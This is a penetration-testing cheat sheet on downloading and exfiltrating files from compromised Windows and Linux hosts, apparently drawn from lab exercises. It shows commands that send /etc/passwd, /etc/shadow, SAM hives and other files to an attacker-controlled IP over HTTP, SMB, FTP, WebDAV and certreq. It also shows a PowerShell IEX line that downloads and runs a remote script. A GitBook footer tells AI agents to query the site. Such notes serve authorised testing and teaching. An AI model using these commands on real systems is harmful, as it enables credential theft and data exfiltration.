# Download - Exfiltration ## Tool Updog ``` updog --ssl --port 9090 --password "exegol4thewin" --directory /opt/resources ``` ## Living Off Trusted Sites {% embed url="" %} ## Web transfer ### **Create a Web Server on Linux victim host** #### Python 3 ```shell-session python3 -m http.server 8000 ``` #### Python 2.7 ```shell-session python2.7 -m SimpleHTTPServer ``` #### PHP ```shell-session php -S 0.0.0.0:8000 ``` #### Ruby ```shell-session ruby -run -ehttpd . -p8000 ``` ### Create a web server on a Windows host #### Windows - HFS HTTP File Server {% embed url="" %} #### Powershell\_HttpServer {% embed url="" %} ### Download file ```shell-session wget 192.168.49.128:8000/filetotransfer.txt ``` ## SCP {% embed url="" %} ```shell-session scp /etc/passwd htb-student@10.129.86.90:/home/htb-student/ ``` ``` scp remote_username@10.10.0.2:/remote/file.txt /local/directory ``` ## Base64 ### **Windows** #### **Transfer from victim host to attack** ```powershell-session PS C:\htb> [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte)) IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbX ... ``` ```shell-session echo IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbXB... SNIP ... gICAgbG9jYWxob3N0DQo= | base64 -d > host ``` ## SMB ``` $ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed ``` ``` C:\> move sam.save \\10.10.15.16\CompData 1 file(s) moved. ``` ### Metasploit - Download {% content-ref url="/pages/dtkGhaNT9goTjNNZVnYQ" %} [Metasploit](/0xss0rz/pentest/tools/metasploit.md) {% endcontent-ref %} ### SMBclient - get {% content-ref url="/pages/3jW53CaRXMUs4f8szugL" %} [SMB (445, 139) / RPC](/0xss0rz/pentest/protocols/smb-445-139-rpc.md) {% endcontent-ref %} `smb: \> get prep-prod.txt` Source: {% embed url="" %} ### SMBmap - download {% content-ref url="/pages/3jW53CaRXMUs4f8szugL" %} [SMB (445, 139) / RPC](/0xss0rz/pentest/protocols/smb-445-139-rpc.md) {% endcontent-ref %} ```shell-session $ smbmap -H 10.129.14.128 --download "notes\note.txt" [+] Starting download: notes\note.txt (116 bytes) [+] File output to: /htb/10.129.14.128-notes_note.txt ``` ### SMB over WebDAV #### From Windows to Linux ```shell-session $ sudo pip3 install wsgidav cheroot ``` ```shell-session $ sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous [sudo] password for plaintext: Running without configuration file. 10:02:53.949 - WARNING : App wsgidav.mw.cors.Cors(None).is_disabled() returned True: skipping. 10:02:53.950 - INFO : WsgiDAV/4.0.1 Python/3.9.2 Linux-5.15.0-15parrot1-amd64-x86_64-with-glibc2.31 10:02:53.950 - INFO : Lock manager: LockManager(LockStorageDict) 10:02:53.950 - INFO : Property manager: None 10:02:53.950 - INFO : Domain controller: SimpleDomainController() 10:02:53.950 - INFO : Registered DAV providers by route: 10:02:53.950 - INFO : - '/:dir_browser': FilesystemProvider for path '/usr/local/lib/python3.9/dist-packages/wsgidav/dir_browser/htdocs' (Read-Only) (anonymous) 10:02:53.950 - INFO : - '/': FilesystemProvider for path '/tmp' (Read-Write) (anonymous) 10:02:53.950 - WARNING : Basic authentication is enabled: It is highly recommended to enable SSL. 10:02:53.950 - WARNING : Share '/' will allow anonymous write access. 10:02:53.950 - WARNING : Share '/:dir_browser' will allow anonymous read access. 10:02:54.194 - INFO : Running WsgiDAV/4.0.1 Cheroot/8.6.0 Python 3.9.2 10:02:54.194 - INFO : Serving on http://0.0.0.0:80 ... ``` ```cmd-session C:\htb> dir \\192.168.49.128\DavWWWRoot Volume in drive \\192.168.49.128\DavWWWRoot has no label. Volume Serial Number is 0000-0000 Directory of \\192.168.49.128\DavWWWRoot 05/18/2022 10:05 AM . 05/18/2022 10:05 AM .. 05/18/2022 10:05 AM sharefolder 05/18/2022 10:05 AM 13 filetest.txt 1 File(s) 13 bytes 3 Dir(s) 43,443,318,784 bytes free ``` ```cmd-session C:\htb> copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\ C:\htb> copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\ ``` ## FTP ### From Windows victim to Linux ```shell-session 0xss0rz@htb[/htb]$ sudo python3 -m pyftpdlib --port 21 --write /usr/local/lib/python3.9/dist-packages/pyftpdlib/authorizers.py:243: RuntimeWarning: write permissions assigned to anonymous user. warnings.warn("write permissions assigned to anonymous user.", [I 2022-05-18 10:33:31] concurrency model: async [I 2022-05-18 10:33:31] masquerade (NAT) address: None [I 2022-05-18 10:33:31] passive ports: None [I 2022-05-18 10:33:31] >>> starting FTP server on 0.0.0.0:21, pid=5155 <<< ``` ```powershell-session PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts') ``` or ```cmd-session C:\htb> echo open 192.168.49.128 > ftpcommand.txt C:\htb> echo USER anonymous >> ftpcommand.txt C:\htb> echo binary >> ftpcommand.txt C:\htb> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt C:\htb> echo bye >> ftpcommand.txt C:\htb> ftp -v -n -s:ftpcommand.txt ftp> open 192.168.49.128 Log in with USER and PASS first. ftp> USER anonymous ftp> PUT c:\windows\system32\drivers\etc\hosts ftp> bye ``` ## Web exfiltration ### Uploadserver #### Linux to Linux {% embed url="" %} ```shell-session $ sudo python3 -m pip install --user uploadserver Collecting uploadserver Using cached uploadserver-2.0.1-py3-none-any.whl (6.9 kB) Installing collected packages: uploadserver Successfully installed uploadserver-2.0.1 ``` ```shell-session # Create a Self-Signed Certificate $ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' Generating a RSA private key ................................................................................+++++ .......+++++ writing new private key to 'server.pem' ----- ``` ```shell-session $ mkdir https && cd https ``` ```shell-session $ sudo python3 -m uploadserver 443 --server-certificate ~/server.pem ``` ```shell-session ## Uplad multiple files $ curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure ``` #### Windows victim to Linux {% embed url="" %} ```shell-session pip3 install uploadserver ``` ```shell-session $ python3 -m uploadserver File upload available at /upload Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... ``` HTTPS => Create Self-Signed Certificate - See [Web exfiltration - Linux to Linux](#linux-to-linux) {% embed url="" %} ```powershell-session PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') PS C:\htb> Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts [+] File Uploaded: C:\Windows\System32\drivers\etc\hosts [+] FileHash: 5E7241D66FD77E9E8EA866B6278B2373 ``` ### PowerShell Base64 Web Upload ```powershell-session PS C:\htb> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte)) PS C:\htb> Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64 ``` ```shell-session $ nc -lvnp 8000 listening on [any] 8000 ... connect to [192.168.49.128] from (UNKNOWN) [192.168.49.129] 50923 POST / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Content-Type: application/x-www-form-urlencoded Host: 192.168.49.128:8000 Content-Length: 1820 Connection: Keep-Alive IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbXBsZSBIT1NUUyBmaWxlIHVzZWQgYnkgTWljcm9zb2Z0IFRDUC9JUCBmb3IgV2luZG93cy4NCiMNCiMgVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBtYXBwaW5ncyBvZiBJUCBhZGRyZXNzZXMgdG8gaG9zdCBuYW1lcy4gRWFjaA0KIyBlbnRyeSBzaG91bGQgYmUga2VwdCBvbiBhbiBpbmRpdmlkdWFsIGxpbmUuIFRoZSBJUCBhZGRyZXNzIHNob3VsZA0KIyBiZSBwbGFjZWQgaW4gdGhlIGZpcnN0IGNvbHVtbiBmb2xsb3dlZCBieSB0aGUgY29ycmVzcG9uZGluZyBob3N0IG5hbWUuDQojIFRoZSBJUCBhZGRyZXNzIGFuZCB0aGUgaG9zdCBuYW1lIHNob3VsZCBiZSBzZXBhcmF0ZWQgYnkgYXQgbGVhc3Qgb25lDQo ...SNIP... ``` ```shell-session echo | base64 -d -w 0 > hosts ``` ### Python {% embed url="" %} ``` sudo python3 -m pip install --user uploadserver ``` ```shell-session $ python3 -m uploadserver File upload available at /upload Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... ``` ```shell-session python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("/etc/passwd","rb")})' ``` ## Netcat nc.exe {% embed url="" %} Commands {% embed url="" %} ## WinRM ```powershell-session PS C:\htb> Test-NetConnection -ComputerName DATABASE01 -Port 5985 ComputerName : DATABASE01 RemoteAddress : 192.168.1.101 RemotePort : 5985 InterfaceAlias : Ethernet0 SourceAddress : 192.168.1.100 TcpTestSucceeded : True ``` ```powershell-session PS C:\htb> $Session = New-PSSession -ComputerName DATABASE01 ``` ```powershell-session PS C:\htb> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session ``` ## RDP ### rdesktop ```shell-session rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files' ``` ### xfreerdp ``` xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer ``` ### Remmina {% embed url="" %} ### Windows to windows {% embed url="" %} ## LOLBAS {% embed url="" %}

### **CertReq.exe** ```cmd-session C:\htb> certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini Certificate Request Processor: The operation timed out 0x80072ee2 (WinHttp: 12002 ERROR_WINHTTP_TIMEOUT) ``` ```shell-session 0xss0rz@htb[/htb]$ sudo nc -lvnp 8000 listening on [any] 8000 ... connect to [192.168.49.128] from (UNKNOWN) [192.168.49.1] 53819 POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/json User-Agent: Mozilla/4.0 (compatible; Win32; NDES client 10.0.19041.1466/vb_release_svc_prod1) Content-Length: 92 Host: 192.168.49.128:8000 ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 ``` ## GTFOBins {% embed url="" %}

## Metasploit {% content-ref url="/pages/dtkGhaNT9goTjNNZVnYQ" %} [Metasploit](/0xss0rz/pentest/tools/metasploit.md) {% endcontent-ref %} ``` meterpreter > download c:\\boot.ini [*] downloading: c:\boot.ini -> c:\boot.ini [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini meterpreter > ``` ## WinRM {% content-ref url="/pages/5zE4duLRkawZtstWjbb7" %} [Evil-WinRM](/0xss0rz/pentest/tools/evil-winrm.md) {% endcontent-ref %} ``` .Evil-WinRM* PS C:\Users\Administrator\Desktop> download 20240308092156_BloodHound.zip ``` ## Resources {% embed url="" %} {% embed url="" %} {% embed url="" %} ## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp) [**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/file-transfer/download-exfiltration.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.